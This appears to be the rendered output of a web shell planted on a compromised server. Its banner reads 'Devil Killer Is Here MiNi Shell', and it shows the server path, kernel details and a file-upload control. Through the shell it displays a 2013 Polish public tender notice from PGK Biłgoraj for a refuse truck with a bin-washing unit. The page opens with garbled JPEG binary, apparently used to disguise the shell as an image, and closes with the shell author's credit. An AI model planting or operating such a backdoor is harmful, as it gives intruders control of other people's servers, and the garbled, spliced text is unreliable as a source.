JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130902/353038-N-2013.html

<p class="kh_header"><b>Biłgoraj: Dostawa do siedziby PGK Sp. z o.o. w Biłgoraju, ul. Łąkowa 13, fabrycznie nowej śmieciarki wyposażonej w automatyczne urządzenie do mycia pojemników na odpady oraz świadczenie usług serwisowych w okresie gwarancji
nr zamówienia nadany przez Zamawiającego ZP/ZOŚ/5/2013</b><br>
<b>Numer ogłoszenia: 353038 - 2013; data zamieszczenia: 02.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Łąkowa 13, 23-400 Biłgoraj, woj. lubelskie, tel. 084 6881852, 6882916, faks 084 6881847.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgk.biuletyn-publiczny.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa do siedziby PGK Sp. z o.o. w Biłgoraju, ul. Łąkowa 13, fabrycznie nowej śmieciarki wyposażonej w automatyczne urządzenie do mycia pojemników na odpady oraz świadczenie usług serwisowych w okresie gwarancji
nr zamówienia nadany przez Zamawiającego ZP/ZOŚ/5/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa do siedziby zamawiającego - ul. Łąkowa 13, 23-400 Biłgoraj 1 sztuki fabrycznie nowego, kompletnego pojazdu do transportu odpadów - śmieciarki - rok produkcji 2013, wyposażonej w automatyczne urządzenie do mycia pojemników na odpady oraz świadczenie usług serwisowych w okresie gwarancji , o następujących wymaganych parametrach technicznych  i wyposażeniu: 
1.1. Wymagane parametry techniczne oraz wyposażenie Zabudowy:

1.Zabudowa skrzyniowa z urządzeniem załadowczym tylnym 
2.Zabudowa fabrycznie nowa,
3.Skrzynia ładunkowa ożebrowana na zewnątrz profilem stalowym, dopuszczalna jest skrzynia  owalna boki i dach skrzyni owalnej wykonane z pełnych arkuszy blachy . 
4.pojemność  skrzyni  ładunkowej  -  min. 18 m3 na odpady, 3 m3 na wodę brudną i czystą do mycia pojemników,
5.zbiorniki na wodę czystą i brudną zamontowane wewnątrz skrzyni ładunkowej dopuszcza się zamontowanie zbiorników na wodę pomiędzy kabina a skrzynią ładunkową,
- nie dopuszcza się zamontowania zbiorników na wodę na powierzchni nabudowy lub pod podwoziem,
6.Skrzynia ładunkowa posiadająca drzwi  kontrolne na bocznej ścianie,
7.Objętość kosza zasypowego min. 2 m3,
8.Odwłok wykonany z blachy trudnościeralnej o gr min 8 mm,
9.Wanna odwłoka wykonana z blachy trudnościeralnej  o gr. min. 8 mm,
10.Mechanizm zgniatania liniowo - płytowy czyli tzw. szufladowy,
11.Prowadnice płyty wypychającej umiejscowione na ścianach bocznych zabudowy,
12.Stopień zagęszczenia odpadów min. 1:5,
13.Możliwość zmiany ciśnienia ( stopnia zagęszczenia) w układzie hydraulicznym na min. trzy inne wartości  - przełączenie w pulpicie w kabinie kierowcy na warianty surowców wtórnych,
14.Wrzutnik dostosowany do współpracy z pojemnikami od 120 l do 1100 l litrów, 
15.Wrzutnik mocowany do odwłoka 
16.Wrzutnik w całości ocynkowany - lakierowany,
17.Wysokość krawędzi wrzutnika po opuszczeniu burty od 1200 mm do 1400 mm,
18.Czas opróżniania pojemników
a) 120 l	  -        max. 8 sek,
b) 1100 l -       max. 11 sek, 
19.Sterowanie urządzeniem zasypowym umieszczone po obu stronach odwłoka,
20.Sterownie hydrauliczne wrzutnika proporcjonalne,
21.Dwa siłowniki prasy zgniatającej umieszczone na zewnątrz odwłoka, 
22.Układ uwalniania zakleszczonych przedmiotów, 
23.Króciec odpływowy w wannie załadowczej z kurkiem spustowym, 
24.Kamera wraz z mikrofonem umieszczona z tyłu zabudowy oraz monitor i głośnik zainstalowane w kabinie kierowcy, 
25.Dwa wyłączniki bezpieczeństwa,
26.Sterownik do automatycznego cyklu załadunku oraz cyklu pojedynczego, 
27.Sterowanie ręczne, 
28.Sterowanie płytą wypychającą wysuwanie i wsuwanie odbywa się z pulpitu znajdującego się w kabinie kierowcy
29.Możliwość odczytu w urządzeniu rejestrującym liczby cykli pracy m.in.:
 prasy zagęszczającej, podnoszenia i opuszczania odwłoka, czasu pracy pompy hydraulicznej 
  przez osoby nadzorujące prace obsługi
30.Możliwość wykonania auto diagnozy sprawności układu elektrycznego przez urządzenie znajdujące się w kabinie kierowcy,
31.Zabudowa wykonana ze stali, minimum  dwukrotnie gruntowana i lakierowana, 
32.Kolor zabudowy pomarańczowy , 
33.Oświetlenie wg obowiązujących  przepisów:
światła hamowania, światła postojowe, kierunkowskazy, dwa światła alarmowe, kogut  z przodu i z tyłu pojazdu, reflektor roboczy z tyłu
34.Pasy odblaskowe (ostrzegawcze) na kabinie i odwłoku,     
35.Dwa stopnie dla ładowaczy wraz z czujnikami ograniczającymi prędkość i jazdę w tył, automatyczna informacja w kabinie kierowcy o tym, który stopień jest zajęty, 
36.Sygnał dźwiękowy przy cofaniu pojazdu,
37.Zbiornik do mycia rąk,
38.Standardowy zestaw narzędzi, pokrowce na siedzenia, dywaniki podłogowe gumowe, apteczka, gaśnica, trójkąt ostrzegawczy, podnośnik hydrauliczny,

Pozostałe wymagania:
- Komplet dokumentów niezbędnych do rejestracji pojazdu w dniu dostarczenia pojazdu.

1.2. Wymagane parametry techniczne oraz wyposażenie podwozia - samochód ciężarowy o DMC 26 ton

1.Kabina dzienna trzyosobowa,
2.Kolor kabiny fabryczny biały,
3.Lusterka główne i szerokokątne sterowane i ogrzewane elektrycznie,
4.Szyby w drzwiach sterowane elektrycznie,
5.Osłona przeciwsłoneczna przedniej szyby,
6.Halogenowe światła przednie wykonane z tworzywa odpornego na uderzenia,
7.Kolumna kierownicy regulowana w dwóch płaszczyznach,
8.Fotel kierowcy na zawieszeniu pneumatycznym,
9.Ręczna lub automatyczna kimatyzacja, 
10.Radio CD,
11.Komputer pokładowy z wyświetlaczem z menu w j. polskim
12.Ogranicznik prędkości do 85 km na h
13.Akustyczny ostrzegawczy sygnał cofania
14.Immobiliser silnika
15.Oś przednia na zawieszeniu parabolicznym o nośności min. 7,5 t
16.Oś napędowa o nośności min. 11,5 t z jedną redukcją i miechami pneumatycznymi.
17.Oś wleczona skrętna i podnoszona o nośności min. 7,4 t.
18.Mechaniczna blokada mechanizmu różnicowego osi napędowej.
19.Opony w rozmiarze 315 80R22,5 z bieżnikiem na drogi utwardzone i nieutwardzone.
20.Koło zapasowe mocowane do ramy podwozia.
21.Silnik o mocy min. 290 KM, 
22.Emisja spalin Euro 5,
23.Ręczna min. 8-biegowa skrzynia biegów 
24.Wentylowane hamulce tarczowe na osi przedniej i tylnej
25.Rozstaw osi pomiędzy pierwszą, a drugą osią min. 3,8 m
26.Wylot rury wydechowej skierowany do góry za kabiną
27.Stalowy zbiornik paliwa o pojemności min. 200 l
28.Pojazd przystosowany do pracy w niskich temperaturach otoczenia, wyposażony w układ wspomagający rozruch silnika zimą,
29.Wlot powietrza z cyklonowym filtrem wstępnym za kabiną,
30.Płyta zabezpieczająca chłodnice,
31.DMC pojazdu min. 26 000 kg,
32.Gwarancja 2 lata na cały pojazd.


1.3. Wymagane parametry techniczne oraz wyposażenie - urządzenie myjące:

Urządzenie myjące wyposażone w dwa ruchome ramiona zakończone wysokociśnieniowymi obrotowymi głowicami myjącymi. Umożliwiające mycie dwóch pojemników jednocześnie, jednego małego (prawy lub lewy) lub dwoma dyszami jednego pojemnika 1100 litrów, wyposażone w:
agregat wysokociśnieniowy z silnikiem hydraulicznym do ich napędu
2 rotacyjne głowice myjące działające niezależnie od siebie (możliwość mycia jedną głowicą)
2 pneumatyczne ruchome ramiona zakończone głowicami myjącymi
centralne podwieszenie głowic myjących w odwłoku
pojemność zbiorników wody czystej i brudnej zoptymalizowana do pojemności śmieciarki umożliwająca  umycie  minimum 300 pojemników 120 litrowych .
napęd agregatów hydrauliczny z układu śmieciarki
zbiorniki na wodę wykonane ze stali nierdzewnej
odstojnik montowany na odwłoku z pneumatycznym systemem transportu wody brudnej do zbiornika głównego
sygnalizacja pełnego odstojnika wody brudnej na kasecie sterującej  
regulowany czas mycia pojemników
zwijany wąż min. 8 m montowany na bębnie wraz z wysokociśnieniową lancą myjącą ciśnienie 150 bar.
układ systemu myjącego wyposażony w przyłącze pneumatyczne pozwalające na wyczyszczenie układu naoliwionym powietrzem max ciśnienie 10 bar i przygotowanie go do zimy.
przeprowadzenie szkolenia wyznaczonych pracowników w zakresie prawidłowego i bezpiecznego eksploatowania urządzenia.

2. Zakres przedmiotu zamówienia obejmuje ponadto:
1) komplet dokumentów wymaganych do rejestracji pojazdu w Wydziale Komunikacji,
3) instrukcję obsługi pojazdu kompletnego tj, podwozia, zabudowy oraz urządzenia myjącego w języku polskim,
4) książki gwarancyjne na podwozie, zabudowę i urządzenie myjące w języku polskim,
5) przeszkolenie pracowników Zamawiającego w zakresie obsługi przedmiotu zamówienia,
6) dokument potwierdzający, że zabudowa spełnia normę PN-EN 1501-1,
7) dokument potwierdzający spełnienie norm bezpieczeństwa CE,
8) dokument potwierdzający spełnienie wymagań normy emisji spalin EURO 5.
3. Wymagane warunki udzielenia gwarancji, obligatoryjnych przeglądów gwarancyjnych, usług serwisowych w okresie gwarancji i po upływie okresu gwarancji.
1) Zamawiający wymaga, aby okres udzielonej przez wykonawcę gwarancji na kompletny przedmiot zamówienia tj. podwozie, zabudowę i urządzenie myjące wynosił co najmniej 24 miesiące, licząc od daty przekazania przedmiotu zamówienia zamawiającemu.
2) Zamawiający wymaga od wykonawcy aby w okresie trwania gwarancji wykonał obligatoryjne przeglądy 	przedmiotu zamówienia tak dla podwozia, nadwozia oraz urządzenia do mycia pojemników.
Wykonawca zobowiązany jest do wpisania w punkcie A ppkt 5 formularza oferty wszystkich oferowanych rodzajów przeglądów kompletnego pojazdu oraz kosztów przeglądów wraz z kosztem materiałów.
3) Zamawiający wymaga aby ceny oferowanych przeglądów w okresie gwarancji wraz z kosztem materiałów zostały uwzględnione w ostatecznej cenie dostawy tj. cenie składanej oferty. Wykonawca w formularzu oferty składa oświadczenie o uwzględnieniu ceny przeglądów wraz z kosztem materiałów w oferowanej cenie za wykonanie przedmiotu zamówienia. 
Wykonawca w punkcie A ppkt 5 formularza oferty zobowiązany jest podać nazwę, adres, telefon, fax autoryzowanego podmiotu, który będzie wykonawcą przeglądów gwarancyjnych.
4) Zamawiający wymaga od wykonawcy świadczenia usług serwisowych w okresie gwarancyjnym w przypadku  zaistnienia niesprawności przedmiotu zamówienia w zakresie podwozia, nadwozia oraz urządzenia do mycia pojemników.
Wymagany przez zamawiającego okres przystąpienia wykonawcy do świadczenia usług serwisowych w okresie  gwarancyjnym, to 24 godziny od terminu powiadomienia wykonawcy pismem, faxem o  zaistniałej niesprawności przedmiotu zamówienia. 
5)Wykonawca musi posiadać serwis gwarancyjny na terenie Polski. (Wykonawca w punkcie A ppkt 5. formularza ofertowego zobowiązany jest podać adres serwisu, w którym świadczone będą usługi serwisowe.)
6)W okresie gwarancyjnym w przypadku niesprawności (awarii) pojazdu, której usunięcie wymaga okresu powyżej 7 dni  od czasu przystąpienia do  usług serwisowych, Wykonawca na swój koszt zapewni Zamawiającemu, na czas niezbędny do usunięcia usterki (awarii), pojazd zastępczy wyposażony w urządzenie do mycia pojemników o parametrach porównywalnych jak przedmiot zamówienia. 
7)Wykonawca zobowiązany jest wykonywać świadczenie usług serwisowych, zarówno w zakresie podwozia, nadbudowy oraz urządzenia do mycia pojemników, po upływie okresu gwarancji. Zamawiający zawiadamiał będzie Wykonawcę pismem lub faksem o zaistniałej niesprawności przedmiotu zamówienia. (Wykonawca w punkcie A ppkt 7. formularza ofertowego zobowiązany jest podać: - okres świadczenia usług serwisowych po upływie gwarancji (wymagany okres minimum 10 lat), liczbę godzin przystąpienia do świadczenia usług serwisowych od momentu zgłoszenia przez Zamawiającego o niesprawności pojazdu oraz adres serwisu zlokalizowanego najbliżej siedziby Zamawiającego, tj. ul. Łąkowa 13, 23-400 Biłgoraj, który wykonywał będzie usługi serwisowe po upływie okresu gwarancji.).
8.Wykonawca zapewni stały dostęp do części zamiennych dla całego przedmiotu zamówienia. Dostawa części zamiennych do siedziby zamawiającego w terminie do 5 dni od daty otrzymania od zamawiającego pisemnie lub faksem zapotrzebowania. Koszt dostawy części zamiennych po okresie gwarancji ponosić będzie zamawiający..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.45.10-6, 34.14.45.11-3, 50.11.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 27.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium w kwocie -7 000,00 zł.
2. Wadium należy wnieść w jednej z następujących form:
- pieniądzu - na nr konta - 42-1020-5385-0000-9602-0002-5627,
- poręczeniu bankowym, lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancji bankowej,
- gwarancji ubezpieczeniowej,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6B ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
3. Wadium jest wnoszone na okres związania ofertą.
4. Do oferty należy dołączyć dokument potwierdzający wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku  na podstawie złożonego oświadczenia z art. 22 ust 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania tego warunku na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Przez zakres niezbędny do wykazania spełnienia warunku wiedzy i doświadczenia należy rozumieć wykonanie lub wykonywanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 dostaw do podmiotów odbierających odpady komunalne, samochodu specjalistycznego do transportu odpadów (śmieciarki) wyposażonej w urządzenie do mycia pojemników na odpady.
Do wymienionych w wykazie dostaw, Zamawiający wymaga załączenia dowodów - dokumentów potwierdzających, że każda z tych dostaw została wykonana lub jest wykonywana należycie. Niespełnienie przez Wykonawcę warunku posiadania wiedzy i doświadczenia spowoduje wykluczenie Wykonawcy z postępowania o udzielenie zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku na podstawie przedłożonego oświadczenia z art. 22 ust 1 Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgk.biuletyn-publiczny.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Łąkowa 13, 23-400 Biłgoraj.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2013 godzina 10:00, miejsce: siedziba zamawiającego przy ul. Łąkowej 13 w pokoju Nr 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com